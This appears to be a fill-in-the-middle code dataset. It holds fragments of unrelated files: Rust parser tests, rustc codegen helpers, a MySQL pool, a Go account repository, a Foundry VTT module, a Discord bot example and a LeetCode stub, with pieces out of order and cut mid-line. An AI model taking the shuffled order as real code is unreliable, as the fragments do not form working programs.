n: Number::DecInteger(String::from("1"))
}),
op: Operator::Add,
right: Box::new(Expression::BinOp {
left: Box::new(Expression::Num {
n: Number::DecInteger(String::from("2"))
}),
op: Operator::Mult,
right: Box::new(Expression::Num {
n: Number::DecInteger(String::from("3"))
})
}),
}),
op: Operator::Add,
right: Box::new(Expression::Num {
n: Number::DecInteger(String::from("4"))
})
}
}
]
};
assert_eq!(ast, expected);
let stream = Lexer::new("1 + 2 | 3 & 4 << 5 ** 6 - 7\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::BinOp {
left: Box::new(Expression::BinOp {
left: Box::new(Expression::Num {
n: Number::DecInteger(String::from("1"))
}),
op: Operator::Add,
right: Box::new(Expression::Num {
n: Number::DecInteger(String::from("2"))
})
}),
op: Operator::BitOr,
right: Box::new(Expression::BinOp {
left: Box::new(Expression::Num {
n: Number::DecInteger(String::from("3"))
}),
op: Operator::BitAnd,
right: Box::new(Expression::BinOp {
left: Box::new(Expression::Num {
n: Number::DecInteger(String::from("4"))
}),
op: Operator::LShift,
right: Box::new(Expression::BinOp {
left: Box::new(Expression::BinOp {
left: Box::new(Expression::Num {
n: Number::DecInteger(String::from("5"))
}),
op: Operator::Pow,
right: Box::new(Expression::Num {
n: Number::DecInteger(String::from("6"))
})
}),
op: Operator::Sub,
right: Box::new(Expression::Num {
n: Number::DecInteger(String::from("7"))
})
})
})
})
}
}
]
};
assert_eq!(ast, expected);
}
#[test]
fn comparison_ops() {
let stream = Lexer::new("1 < 2 > 3 == 4 >= 5 <= 6 != 7 in a \
not in b is c is not d\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Expr {
value: Expression::Compare {
left: Box::new(Expression::Num {
n: Number::DecInteger(String::from("1"))
}),
ops: vec![
CmpOperator::LT,
CmpOperator::GT,
CmpOperator::EQ,
CmpOperator::GE,
CmpOperator::LE,
CmpOperator::NE,
CmpOperator::In,
CmpOperator::NotIn,
CmpOperator::Is,
CmpOperator::IsNot
],
comparators: vec![
Expression::Num {
n: Number::DecInteger(String::from("2"))
},
Expression::Num {
n: Number::DecInteger(String::from("3"))
},
Expression::Num {
n: Number::DecInteger(String::from("4"))
},
Expression::Num {
n: Number::DecInteger(String::from("5"))
},
Expression::Num {
n: Number::DecInteger(String::from("6"))
},
Expression::Num {
n: Number::DecInteger(String::from("7"))
},
Expression::Name {
id: String::from("a"),
ctx: ExprContext::Load
},
Expression::Name {
id: String::from("b"),
ctx: ExprContext::Load
},
Expression::Name {
id: String::from("c"),
ctx: ExprContext::Load
},
Expression::Name {
id: String::from("d"),
ctx: ExprContext::Load
}
]
}
}
]
};
assert_eq!(ast, expected);
}
| {
let stream = Lexer::new("return p[:,0]\n");
let ast = parser::parse_start_symbol(stream).unwrap();
let expected = Ast::Module {
body: vec![
Statement::Return { value: Some(Expression::Subscript {
value: Box::new(Expression::Name {
id: String::from("p"),
ctx: ExprContext::Load
}),
slice: Box::new(Slice::ExtSlice {
dims: vec![
Slice::Slice {
lower: None,
upper: None,
step: None
},
Slice::Index {
value: Expression::Num {
n: Number::DecInteger(String::from("0"))
}
}
]
}),
ctx: ExprContext::Load
})}
]
};
assert_eq!(ast, expected);
} |
common.rs | #![allow(non_camel_case_types, non_snake_case)]
//! Code that is useful in various codegen modules.
use crate::consts;
use crate::llvm::{self, BasicBlock, Bool, ConstantInt, False, OperandBundleDef, True};
use crate::type_::Type;
use crate::type_of::LayoutLlvmExt;
use crate::value::Value;
use log::debug;
use rustc::bug;
use rustc_codegen_ssa::traits::*;
use crate::consts::const_alloc_to_llvm;
use rustc::mir::interpret::{Allocation, GlobalAlloc, Scalar};
use rustc::ty::layout::{self, HasDataLayout, LayoutOf, Size, TyLayout};
use rustc_codegen_ssa::mir::place::PlaceRef;
use libc::{c_char, c_uint};
use rustc_ast::ast::Mutability;
use rustc_span::symbol::Symbol;
pub use crate::context::CodegenCx;
/*
* A note on nomenclature of linking: "extern", "foreign", and "upcall".
*
* An "extern" is an LLVM symbol we wind up emitting an undefined external
* reference to. This means "we don't have the thing in this compilation unit,
* please make sure you link it in at runtime". This could be a reference to
* C code found in a C library, or rust code found in a rust crate.
*
* Most "externs" are implicitly declared (automatically) as a result of a
* user declaring an extern _module_ dependency; this causes the rust driver
* to locate an extern crate, scan its compilation metadata, and emit extern
* declarations for any symbols used by the declaring crate.
*
* A "foreign" is an extern that references C (or other non-rust ABI) code.
* There is no metadata to scan for extern references, so in these cases either
* a header-digester like bindgen or manual function prototypes have to
* serve as declarators. So these are usually given explicitly as prototype
* declarations, in rust code, with ABI attributes on them noting which ABI to
* link via.
*
* An "upcall" is a foreign call generated by the compiler (not corresponding
* to any user-written call in the code) into the runtime library, to perform
* some helper task such as bringing a task to life, allocating memory, etc.
*
*/
/// A structure representing an active landing pad for the duration of a basic
/// block.
///
/// Each `Block` may contain an instance of this, indicating whether the block
/// is part of a landing pad or not. This is used to make decisions about whether
/// to emit `invoke` instructions (e.g., in a landing pad we don't continue to
/// use `invoke`) and also about various function call metadata.
///
/// For GNU exceptions (`landingpad` + `resume` instructions) this structure is
/// just a bunch of `None` instances (not too interesting), but for MSVC
/// exceptions (`cleanuppad` + `cleanupret` instructions) this contains data.
/// When inside of a landing pad, each function call in LLVM IR needs to be
/// annotated with which landing pad it's a part of. This is accomplished via
/// the `OperandBundleDef` value created for MSVC landing pads.
pub struct Funclet<'ll> {
cleanuppad: &'ll Value,
operand: OperandBundleDef<'ll>,
}
impl Funclet<'ll> {
pub fn new(cleanuppad: &'ll Value) -> Self {
Funclet { cleanuppad, operand: OperandBundleDef::new("funclet", &[cleanuppad]) }
}
pub fn cleanuppad(&self) -> &'ll Value {
self.cleanuppad
}
pub fn bundle(&self) -> &OperandBundleDef<'ll> {
&self.operand
}
}
impl BackendTypes for CodegenCx<'ll, 'tcx> {
type Value = &'ll Value;
type Function = &'ll Value;
type BasicBlock = &'ll BasicBlock;
type Type = &'ll Type;
type Funclet = Funclet<'ll>;
type DIScope = &'ll llvm::debuginfo::DIScope;
type DIVariable = &'ll llvm::debuginfo::DIVariable;
}
impl CodegenCx<'ll, 'tcx> {
pub fn const_array(&self, ty: &'ll Type, elts: &[&'ll Value]) -> &'ll Value {
unsafe { llvm::LLVMConstArray(ty, elts.as_ptr(), elts.len() as c_uint) }
}
pub fn const_vector(&self, elts: &[&'ll Value]) -> &'ll Value {
unsafe { llvm::LLVMConstVector(elts.as_ptr(), elts.len() as c_uint) }
}
pub fn const_bytes(&self, bytes: &[u8]) -> &'ll Value {
bytes_in_context(self.llcx, bytes)
}
fn const_cstr(&self, s: Symbol, null_terminated: bool) -> &'ll Value {
unsafe {
if let Some(&llval) = self.const_cstr_cache.borrow().get(&s) {
return llval;
}
let s_str = s.as_str();
let sc = llvm::LLVMConstStringInContext(
self.llcx,
s_str.as_ptr() as *const c_char,
s_str.len() as c_uint,
!null_terminated as Bool,
);
let sym = self.generate_local_symbol_name("str");
let g = self.define_global(&sym[..], self.val_ty(sc)).unwrap_or_else(|| {
bug!("symbol `{}` is already defined", sym);
});
llvm::LLVMSetInitializer(g, sc);
llvm::LLVMSetGlobalConstant(g, True);
llvm::LLVMRustSetLinkage(g, llvm::Linkage::InternalLinkage);
self.const_cstr_cache.borrow_mut().insert(s, g);
g
}
}
pub fn const_get_elt(&self, v: &'ll Value, idx: u64) -> &'ll Value {
unsafe {
assert_eq!(idx as c_uint as u64, idx);
let us = &[idx as c_uint];
let r = llvm::LLVMConstExtractValue(v, us.as_ptr(), us.len() as c_uint);
debug!("const_get_elt(v={:?}, idx={}, r={:?})", v, idx, r);
r
}
}
}
impl ConstMethods<'tcx> for CodegenCx<'ll, 'tcx> {
fn const_null(&self, t: &'ll Type) -> &'ll Value {
unsafe { llvm::LLVMConstNull(t) }
}
fn const_undef(&self, t: &'ll Type) -> &'ll Value {
unsafe { llvm::LLVMGetUndef(t) }
}
fn const_int(&self, t: &'ll Type, i: i64) -> &'ll Value {
unsafe { llvm::LLVMConstInt(t, i as u64, True) }
}
fn const_uint(&self, t: &'ll Type, i: u64) -> &'ll Value {
unsafe { llvm::LLVMConstInt(t, i, False) }
}
fn const_uint_big(&self, t: &'ll Type, u: u128) -> &'ll Value {
unsafe {
let words = [u as u64, (u >> 64) as u64];
llvm::LLVMConstIntOfArbitraryPrecision(t, 2, words.as_ptr())
}
}
fn const_bool(&self, val: bool) -> &'ll Value {
self.const_uint(self.type_i1(), val as u64)
}
fn const_i32(&self, i: i32) -> &'ll Value {
self.const_int(self.type_i32(), i as i64)
}
fn const_u32(&self, i: u32) -> &'ll Value {
self.const_uint(self.type_i32(), i as u64)
}
fn const_u64(&self, i: u64) -> &'ll Value {
self.const_uint(self.type_i64(), i)
}
fn const_usize(&self, i: u64) -> &'ll Value {
let bit_size = self.data_layout().pointer_size.bits();
if bit_size < 64 {
// make sure it doesn't overflow
assert!(i < (1 << bit_size));
}
self.const_uint(self.isize_ty, i)
} | self.const_uint(self.type_i8(), i as u64)
}
fn const_real(&self, t: &'ll Type, val: f64) -> &'ll Value {
unsafe { llvm::LLVMConstReal(t, val) }
}
fn const_str(&self, s: Symbol) -> (&'ll Value, &'ll Value) {
let len = s.as_str().len();
let cs = consts::ptrcast(
self.const_cstr(s, false),
self.type_ptr_to(self.layout_of(self.tcx.mk_str()).llvm_type(self)),
);
(cs, self.const_usize(len as u64))
}
fn const_struct(&self, elts: &[&'ll Value], packed: bool) -> &'ll Value {
struct_in_context(self.llcx, elts, packed)
}
fn const_to_opt_uint(&self, v: &'ll Value) -> Option<u64> {
try_as_const_integral(v).map(|v| unsafe { llvm::LLVMConstIntGetZExtValue(v) })
}
fn const_to_opt_u128(&self, v: &'ll Value, sign_ext: bool) -> Option<u128> {
try_as_const_integral(v).and_then(|v| unsafe {
let (mut lo, mut hi) = (0u64, 0u64);
let success = llvm::LLVMRustConstInt128Get(v, sign_ext, &mut hi, &mut lo);
success.then_some(hi_lo_to_u128(lo, hi))
})
}
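// scalar_to_backend lowers a const-eval `Scalar` to an LLVM constant: raw bits
// become integer constants (with an int-to-ptr cast when a pointer type is
// expected), while pointers become a GEP from the backing allocation's address.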
fn scalar_to_backend(
&self,
cv: Scalar,
layout: &layout::Scalar,
llty: &'ll Type,
) -> &'ll Value {
let bitsize = if layout.is_bool() { 1 } else { layout.value.size(self).bits() };
match cv {
Scalar::Raw { size: 0, .. } => {
assert_eq!(0, layout.value.size(self).bytes());
self.const_undef(self.type_ix(0))
}
Scalar::Raw { data, size } => {
assert_eq!(size as u64, layout.value.size(self).bytes());
let llval = self.const_uint_big(self.type_ix(bitsize), data);
if layout.value == layout::Pointer {
unsafe { llvm::LLVMConstIntToPtr(llval, llty) }
} else {
self.const_bitcast(llval, llty)
}
}
Scalar::Ptr(ptr) => {
let alloc_kind = self.tcx.alloc_map.lock().get(ptr.alloc_id);
let base_addr = match alloc_kind {
Some(GlobalAlloc::Memory(alloc)) => {
let init = const_alloc_to_llvm(self, alloc);
let value = match alloc.mutability {
Mutability::Mut => self.static_addr_of_mut(init, alloc.align, None),
_ => self.static_addr_of(init, alloc.align, None),
};
if !self.sess().fewer_names() {
llvm::set_value_name(value, format!("{:?}", ptr.alloc_id).as_bytes());
}
value
}
Some(GlobalAlloc::Function(fn_instance)) => self.get_fn_addr(fn_instance),
Some(GlobalAlloc::Static(def_id)) => {
assert!(self.tcx.is_static(def_id));
self.get_static(def_id)
}
None => bug!("missing allocation {:?}", ptr.alloc_id),
};
let llval = unsafe {
llvm::LLVMConstInBoundsGEP(
self.const_bitcast(base_addr, self.type_i8p()),
&self.const_usize(ptr.offset.bytes()),
1,
)
};
if layout.value != layout::Pointer {
unsafe { llvm::LLVMConstPtrToInt(llval, llty) }
} else {
self.const_bitcast(llval, llty)
}
}
}
}
fn from_const_alloc(
&self,
layout: TyLayout<'tcx>,
alloc: &Allocation,
offset: Size,
) -> PlaceRef<'tcx, &'ll Value> {
assert_eq!(alloc.align, layout.align.abi);
let llty = self.type_ptr_to(layout.llvm_type(self));
let llval = if layout.size == Size::ZERO {
let llval = self.const_usize(alloc.align.bytes());
unsafe { llvm::LLVMConstIntToPtr(llval, llty) }
} else {
let init = const_alloc_to_llvm(self, alloc);
let base_addr = self.static_addr_of(init, alloc.align, None);
let llval = unsafe {
llvm::LLVMConstInBoundsGEP(
self.const_bitcast(base_addr, self.type_i8p()),
&self.const_usize(offset.bytes()),
1,
)
};
self.const_bitcast(llval, llty)
};
PlaceRef::new_sized(llval, layout)
}
fn const_ptrcast(&self, val: &'ll Value, ty: &'ll Type) -> &'ll Value {
consts::ptrcast(val, ty)
}
}
pub fn val_ty(v: &Value) -> &Type {
unsafe { llvm::LLVMTypeOf(v) }
}
pub fn bytes_in_context(llcx: &'ll llvm::Context, bytes: &[u8]) -> &'ll Value {
unsafe {
let ptr = bytes.as_ptr() as *const c_char;
llvm::LLVMConstStringInContext(llcx, ptr, bytes.len() as c_uint, True)
}
}
pub fn struct_in_context(llcx: &'a llvm::Context, elts: &[&'a Value], packed: bool) -> &'a Value {
unsafe {
llvm::LLVMConstStructInContext(llcx, elts.as_ptr(), elts.len() as c_uint, packed as Bool)
}
}
#[inline]
fn hi_lo_to_u128(lo: u64, hi: u64) -> u128 {
((hi as u128) << 64) | (lo as u128)
}
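// Illustrative check of the helper above:
// hi_lo_to_u128(1, 2) == (2u128 << 64) | 1 == 0x00000000000000020000000000000001.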
fn try_as_const_integral(v: &Value) -> Option<&ConstantInt> {
unsafe { llvm::LLVMIsAConstantInt(v) }
} |
fn const_u8(&self, i: u8) -> &'ll Value { |
db.rs | use r2d2;
use r2d2_mysql::mysql::{Opts, OptsBuilder};
use r2d2_mysql::MysqlConnectionManager;
pub type Pool = r2d2::Pool<MysqlConnectionManager>; | let builder = OptsBuilder::from_opts(opts);
let manager = MysqlConnectionManager::new(builder);
r2d2::Pool::new(manager).expect("Failed to create DB Pool")
} |
pub fn get_db_pool() -> Pool {
let db_url = std::env::var("DATABASE_URL").expect("DATABASE_URL must be set");
let opts = Opts::from_url(&db_url).unwrap(); |
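// Illustrative usage sketch (hypothetical; the exact query API depends on the
// `mysql` crate version re-exported by `r2d2_mysql`):
//
// use r2d2_mysql::mysql::prelude::Queryable;
//
// let pool = get_db_pool();
// let mut conn = pool.get().expect("Failed to get connection from pool");
// let version: Option<String> = conn.query_first("SELECT VERSION()").unwrap();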
structs.rs | // Copyright 2020 IOTA Stiftung
// SPDX-License-Identifier: Apache-2.0
// (Re-)generated by schema tool
// >>>> DO NOT CHANGE THIS FILE! <<<<
// Change the json schema instead
#![allow(dead_code)]
#![allow(unused_imports)]
use wasmlib::*;
#[derive(Clone)]
pub struct Location {
pub x : i32,
pub y : i32,
}
impl Location {
pub fn from_bytes(bytes: &[u8]) -> Location {
let mut dec = WasmDecoder::new(bytes);
Location {
x : int32_decode(&mut dec),
y : int32_decode(&mut dec),
}
}
pub fn to_bytes(&self) -> Vec<u8> {
let mut enc = WasmEncoder::new();
int32_encode(&mut enc, self.x);
int32_encode(&mut enc, self.y);
enc.buf()
}
}
#[derive(Clone)]
pub struct ImmutableLocation {
pub(crate) proxy: Proxy,
}
impl ImmutableLocation {
pub fn exists(&self) -> bool {
self.proxy.exists()
}
pub fn value(&self) -> Location {
Location::from_bytes(&self.proxy.get())
}
}
#[derive(Clone)]
pub struct MutableLocation {
pub(crate) proxy: Proxy,
}
impl MutableLocation {
pub fn delete(&self) {
self.proxy.delete();
}
pub fn | (&self) -> bool {
self.proxy.exists()
}
pub fn set_value(&self, value: &Location) {
self.proxy.set(&value.to_bytes());
}
pub fn value(&self) -> Location {
Location::from_bytes(&self.proxy.get())
}
}
| exists |
turnmarker.js | import { Settings } from './settings.js';
import { Main } from './main.js';
/* issues
- markers don't update for all combats if a token is in 2 encounters simultaneously
- when the animation setting is toggled, non-GM clients don't respect the setting until refresh
- TODO: look into adding tokenMagic FX
*/
CONFIG.debug.hooks = false
let turnmarkerMain;
Hooks.on('init', async () => {
Settings.registerSettings();
game.turnmarker = game.turnmarker || {};
turnmarkerMain = new Main()
turnmarkerMain.init()
game.turnmarker = turnmarkerMain
})
Hooks.on('ready', () => {
turnmarkerMain.praiseTheLordAndPassTheAmmunition()
});
| });
Hooks.on('deleteCombatant', async (combat, combatant, update) => {
let tmarkers = turnmarkerMain.tms.getTurnMarkers(combatant._id)
let smarkers = turnmarkerMain.tms.getStartMarkers(combatant._id)
turnmarkerMain.tms.deleteFromList(tmarkers)
turnmarkerMain.tms.deleteFromList(smarkers)
})
Hooks.on('updateCombatant', async (combat, combatant, update) => {
turnmarkerMain.handleUpdateCombatent(combat, combatant, update)
})
Hooks.on('updateCombat', async (combat, update) => {
turnmarkerMain.processNextTurn(combat, update)
})
Hooks.on('createTile', (scene, tile) => {
turnmarkerMain.startAnimations()
});
Hooks.on('deleteTile', async (scene, tile) => {
turnmarkerMain.deleteLinkedMarkers(tile)
})
Hooks.on('deleteCombat', async (combat) => {
turnmarkerMain.deleteCombatMarkers(combat)
turnmarkerMain.clearTracker(combat)
});
Hooks.on('updateToken', (scene, updateToken, updateData) => {
turnmarkerMain.processInterTurn(updateToken, updateData)
});
Hooks.on('pauseGame', (isPaused) => {
turnmarkerMain.handlePause(isPaused)
}); | Hooks.on('tmSettingsChanged', async (d) => {
turnmarkerMain.applySettings(d) |
account_repository_db.go | package repository
import (
"api-auth/src/entity"
"encoding/json"
"log"
"time"
"github.com/google/uuid"
"go.mongodb.org/mongo-driver/bson"
"go.mongodb.org/mongo-driver/bson/primitive"
)
const (
ACCOUNT = "accounts"
ID = "_id"
PROJECT_ID = "projectId"
USERNAME = "username"
ACTIVED = "activated"
LAST_LOGIN = "lastLogin"
PASSWORD = "password"
CREATED_AT = "createdAt"
CREATED_BY = "createdBy"
UPDATED_AT = "updatedAt"
UPDATED_BY = "updatedBy"
SYSTEM = "SYSTEM"
)
type AccountRepositoryDB struct {
entity.AccountRepository
documentDB DocumentDB
cache Cache
}
type AccountModel struct {
ID primitive.ObjectID `bson:"_id,omitempty" json:"_id"`
ProjectID primitive.ObjectID `bson:"projectId,omitempty"`
UID string `bson:"uid,omitempty"`
FirstName string `bson:"firstName,omitempty"`
LastName string `bson:"lastName,omitempty"`
Email string `bson:"email,omitempty"`
Username string `bson:"username,omitempty"`
Password string `bson:"password,omitempty"`
LastLogin time.Time `bson:"lastLogin,omitempty"`
IsActive bool `bson:"activated"`
VerifiedEmail bool `bson:"verifiedEmail,omitempty"`
ActivedAt time.Time `bson:"activedAt,omitempty"`
// Exported so the BSON marshaller can actually persist these audit fields;
// unexported struct fields are ignored by the MongoDB driver.
CreatedAt time.Time `bson:"createdAt,omitempty"`
CreatedBy string `bson:"createdBy,omitempty"`
UpdatedAt time.Time `bson:"updatedAt,omitempty"`
UpdatedBy string `bson:"updatedBy,omitempty"`
}
func NewAccountModel() *AccountModel {
return &AccountModel{
ID: primitive.NewObjectID(),
}
}
func NewAccountRepositoryDB(documentDB DocumentDB, cache Cache) *AccountRepositoryDB {
return &AccountRepositoryDB{
documentDB: documentDB,
cache: cache,
}
}
func (repo *AccountRepositoryDB) modelToEntity(model AccountModel) *entity.Account {
account := &entity.Account{
ID: model.ID.Hex(),
ProjectID: model.ProjectID.Hex(),
UID: uuid.MustParse(model.UID),
FirstName: model.FirstName,
LastName: model.LastName,
Email: model.Email,
Username: model.Username,
Password: model.Password,
VerifiedEmail: model.VerifiedEmail,
IsActive: model.IsActive,
ActivedAt: model.ActivedAt,
LastLogin: model.LastLogin,
}
return account
}
func (repo *AccountRepositoryDB) entityToModel(account entity.Account) *AccountModel {
projectID, _ := primitive.ObjectIDFromHex(account.ProjectID)
accountID := primitive.NewObjectID()
if account.ID != "" {
accountID, _ = primitive.ObjectIDFromHex(account.ID)
}
model := &AccountModel{
ID: accountID,
ProjectID: projectID,
UID: account.UID.String(),
FirstName: account.FirstName,
LastName: account.LastName,
Email: account.Email,
Username: account.Username,
Password: account.Password,
LastLogin: account.LastLogin,
IsActive: account.IsActive,
VerifiedEmail: account.VerifiedEmail,
ActivedAt: account.ActivedAt,
}
return model
}
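// FindByUsernameAndProject resolves the account cache-aside: a miss on the
// "<projectID>:<username>" key falls through to MongoDB and repopulates the cache.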
func (repo *AccountRepositoryDB) FindByUsernameAndProject(username string, projectID string) (*entity.Account, error) {
log.Printf("FindByUsernameAndProject, username: %s, projectID: %s", username, projectID)
var account entity.Account
var model AccountModel
key := projectID + ":" + username
dataString, err := repo.cache.Get(key)
if err != nil || dataString == "" {
oid, _ := primitive.ObjectIDFromHex(projectID)
data, errorDB := repo.documentDB.FindOne(ACCOUNT, bson.D{{PROJECT_ID, oid}, {USERNAME, username}})
if errorDB != nil {
return &account, errorDB
}
dataByte, _ := json.Marshal(data)
repo.cache.Set(key, string(dataByte))
j, _ := json.Marshal(data)
json.Unmarshal(j, &model)
account = *repo.modelToEntity(model)
return &account, nil
}
json.Unmarshal([]byte(dataString), &model)
return repo.modelToEntity(model), nil
}
func (repo *AccountRepositoryDB) FindByID(id string) (*entity.Account, error) {
var account entity.Account
var model AccountModel
dataString, err := repo.cache.Get(id)
if err != nil || dataString == "" |
json.Unmarshal([]byte(dataString), &model)
return repo.modelToEntity(model), nil
}
func (repo *AccountRepositoryDB) Insert(account entity.Account) (string, error) {
acc := repo.entityToModel(account)
acc.CreatedAt = time.Now()
acc.CreatedBy = SYSTEM
err := repo.documentDB.InsertOne(ACCOUNT, acc)
if err == nil {
data, _ := json.Marshal(account)
key := account.UID.String()
repo.cache.Set(key, string(data))
}
return acc.ID.Hex(), err
}
func (repo *AccountRepositoryDB) UpdateActived(id string) error {
oid, _ := primitive.ObjectIDFromHex(id)
return repo.documentDB.UpdateOne(ACCOUNT, oid, bson.D{
{"$set", bson.D{{ACTIVED, true}, {UPDATED_AT, time.Now()}, {UPDATED_BY, SYSTEM}}},
})
}
func (repo *AccountRepositoryDB) UpdateLastLogin(id string) error {
oid, _ := primitive.ObjectIDFromHex(id)
now := time.Now()
return repo.documentDB.UpdateOne(ACCOUNT, oid, bson.D{
{"$set", bson.D{{LAST_LOGIN, now}, {UPDATED_AT, now}, {UPDATED_BY, SYSTEM}}},
})
}
func (repo *AccountRepositoryDB) UpdatePassword(id string, password string) error {
oid, _ := primitive.ObjectIDFromHex(id)
now := time.Now()
return repo.documentDB.UpdateOne(ACCOUNT, oid, bson.D{
{"$set", bson.D{{PASSWORD, password}, {UPDATED_AT, now}, {UPDATED_BY, SYSTEM}}},
})
}
| {
oid, err := primitive.ObjectIDFromHex(id)
if err != nil {
return &account, err
}
data, errorDB := repo.documentDB.FindOne(ACCOUNT, bson.D{{ID, oid}})
if errorDB != nil {
return &account, errorDB
}
dataByte, _ := json.Marshal(data)
repo.cache.Set(id, string(dataByte))
j, _ := json.Marshal(data)
json.Unmarshal(j, &model)
return repo.modelToEntity(model), nil
} |
main.rs | //! This example will showcase the beauty of collectors.
//! They allow awaiting messages or reactions from a user in the middle
//! of a control flow, such as inside a command.
use std::{collections::HashSet, env, time::Duration};
use serenity::{
async_trait,
collector::{EventCollectorBuilder, MessageCollectorBuilder},
framework::standard::{
help_commands,
macros::{command, group, help},
Args,
CommandGroup,
CommandResult,
HelpOptions,
StandardFramework,
},
// Collectors are streams, which means we can use `StreamExt` and
// `TryStreamExt`.
futures::stream::StreamExt,
http::Http,
model::prelude::*,
prelude::*,
};
#[group("collector")]
#[commands(challenge)]
struct Collector;
#[help]
async fn my_help(
context: &Context,
msg: &Message,
args: Args,
help_options: &'static HelpOptions,
groups: &[&'static CommandGroup],
owners: HashSet<UserId>,
) -> CommandResult {
let _ = help_commands::with_embeds(context, msg, args, help_options, groups, owners).await;
Ok(())
}
struct Handler;
#[async_trait]
impl EventHandler for Handler {
async fn ready(&self, _: Context, ready: Ready) {
println!("{} is connected!", ready.user.name);
}
}
#[tokio::main]
async fn main() {
// Configure the client with your Discord bot token in the environment.
let token = env::var("DISCORD_TOKEN").expect("Expected a token in the environment");
let http = Http::new_with_token(&token);
// We will fetch your bot's id.
let bot_id = match http.get_current_user().await {
Ok(info) => info.id,
Err(why) => panic!("Could not access user info: {:?}", why),
};
| })
.help(&MY_HELP)
.group(&COLLECTOR_GROUP);
let mut client = Client::builder(&token)
.event_handler(Handler)
.framework(framework)
.await
.expect("Err creating client");
if let Err(why) = client.start().await {
println!("Client error: {:?}", why);
}
}
#[command]
async fn challenge(ctx: &Context, msg: &Message, _: Args) -> CommandResult {
let mut score = 0u32;
let _ = msg.reply(ctx, "How was that crusty crab called again? 10 seconds time!").await;
// There are methods implemented for some models to conveniently collect replies.
// This one returns a future that will await a single message only.
// The other method for messages is called `await_replies` and returns a future
// which builds a stream to easily handle them.
if let Some(answer) = &msg.author.await_reply(&ctx).timeout(Duration::from_secs(10)).await {
if answer.content.to_lowercase() == "ferris" {
let _ = answer.reply(ctx, "That's correct!").await;
score += 1;
} else {
let _ = answer.reply(ctx, "Wrong, it's Ferris!").await;
}
} else {
let _ = msg.reply(ctx, "No answer within 10 seconds.").await;
};
let react_msg = msg
.reply(ctx, "React with the reaction representing 1, you got 10 seconds!")
.await
.unwrap();
// The message model has a way to collect reactions on it.
// Other methods are `await_n_reactions` and `await_all_reactions`.
// Same goes for messages!
if let Some(reaction) = &react_msg
.await_reaction(&ctx)
.timeout(Duration::from_secs(10))
.author_id(msg.author.id)
.await
{
// By default, the collector will collect only added reactions.
// We could also pattern-match the reaction in case we want
// to handle added or removed reactions.
// In this case we will just get the inner reaction.
let emoji = &reaction.as_inner_ref().emoji;
let _ = match emoji.as_data().as_str() {
"1️⃣" => {
score += 1;
msg.reply(ctx, "That's correct!").await
},
_ => msg.reply(ctx, "Wrong!").await,
};
} else {
let _ = msg.reply(ctx, "No reaction within 10 seconds.").await;
};
let _ = msg.reply(ctx, "Write 5 messages in 10 seconds").await;
// We can create a collector from scratch too using this builder future.
let collector = MessageCollectorBuilder::new(&ctx)
// Only collect messages by this user.
.author_id(msg.author.id)
.channel_id(msg.channel_id)
.collect_limit(5u32)
.timeout(Duration::from_secs(10))
// Build the collector.
.build();
// Let's borrow HTTP so we can send a message inside the `async move`.
let http = &ctx.http;
// We want to process each message and get the length.
// There are a couple of ways to do this. Folding the stream with `fold`
// is one way.
// Using `then` to first reply and then create a new stream with all
// messages is another way to do it, which can be nice if you want
// to further process the messages.
// If you don't want to collect the stream, `for_each` may be sufficient.
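// For reference, a fold-based sketch (illustrative, not used below; it would
// consume the collector and only tally a count):
// let count = collector.fold(0u32, |acc, _msg| async move { acc + 1 }).await;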
let collected: Vec<_> = collector
.then(|msg| async move {
let _ = msg.reply(http, format!("I repeat: {}", msg.content)).await;
msg
})
.collect()
.await;
if collected.len() >= 5 {
score += 1;
}
// We can also collect arbitrary events using the generic EventCollector. For example, here we
// collect updates to the messages that the user sent above and check for them updating all 5 of
// them.
let builder = EventCollectorBuilder::new(&ctx)
.add_event_type(EventType::MessageUpdate)
.timeout(Duration::from_secs(20));
// Only collect MessageUpdate events for the 5 MessageIds we're interested in.
let mut collector =
collected.iter().fold(builder, |b, msg| b.add_message_id(msg.id)).build()?;
let _ = msg.reply(ctx, "Edit each of those 5 messages in 20 seconds").await;
let mut edited = HashSet::new();
while let Some(event) = collector.next().await {
match event.as_ref() {
Event::MessageUpdate(e) => {
edited.insert(e.id);
},
e => panic!("Unexpected event type received: {:?}", e.event_type()),
}
if edited.len() >= 5 {
break;
}
}
if edited.len() >= 5 {
score += 1;
let _ = msg.reply(ctx, "Great! You edited 5 out of 5").await;
} else {
let _ = msg.reply(ctx, &format!("You only edited {} out of 5", edited.len())).await;
}
let _ = msg
.reply(ctx, &format!("TIME'S UP! You completed {} out of 4 tasks correctly!", score))
.await;
Ok(())
} | let framework = StandardFramework::new()
.configure(|c| {
c.with_whitespace(true).on_mention(Some(bot_id)).prefix("~").delimiters(vec![", ", ","]) |
s0108_convert_sorted_array_to_binary_search_tree.rs | /**
* [108] Convert Sorted Array to Binary Search Tree
*
* Given an integer array nums where the elements are sorted in ascending order, convert it to a height-balanced binary search tree.
* A height-balanced binary tree is a binary tree in which the depth of the two subtrees of every node never differs by more than one.
*
* Example 1:
* (figure: https://assets.leetcode.com/uploads/2021/02/18/btree1.jpg)
* Input: nums = [-10,-3,0,5,9]
* Output: [0,-3,9,-10,null,5]
* Explanation: [0,-10,5,null,-3,null,9] is also accepted:
* (figure: https://assets.leetcode.com/uploads/2021/02/18/btree2.jpg)
*
* Example 2:
* (figure: https://assets.leetcode.com/uploads/2021/02/18/btree.jpg)
* Input: nums = [1,3]
* Output: [3,1]
* Explanation: [1,3] and [3,1] are both height-balanced BSTs.
*
*
* Constraints:
*
* 1 <= nums.length <= 10^4
* -10^4 <= nums[i] <= 10^4
* nums is sorted in a strictly increasing order.
*
*/
pub struct | {}
use crate::util::tree::{to_tree, TreeNode};
// problem: https://leetcode.com/problems/convert-sorted-array-to-binary-search-tree/
// discuss: https://leetcode.com/problems/convert-sorted-array-to-binary-search-tree/discuss/?currentPage=1&orderBy=most_votes&query=
// submission codes start here
// Definition for a binary tree node.
// #[derive(Debug, PartialEq, Eq)]
// pub struct TreeNode {
// pub val: i32,
// pub left: Option<Rc<RefCell<TreeNode>>>,
// pub right: Option<Rc<RefCell<TreeNode>>>,
// }
//
// impl TreeNode {
// #[inline]
// pub fn new(val: i32) -> Self {
// TreeNode {
// val,
// left: None,
// right: None
// }
// }
// }
use std::cell::RefCell;
use std::rc::Rc;
impl Solution {
pub fn sorted_array_to_bst(nums: Vec<i32>) -> Option<Rc<RefCell<TreeNode>>> {
if nums.is_empty() {
return None;
}
let mid = nums.len() / 2;
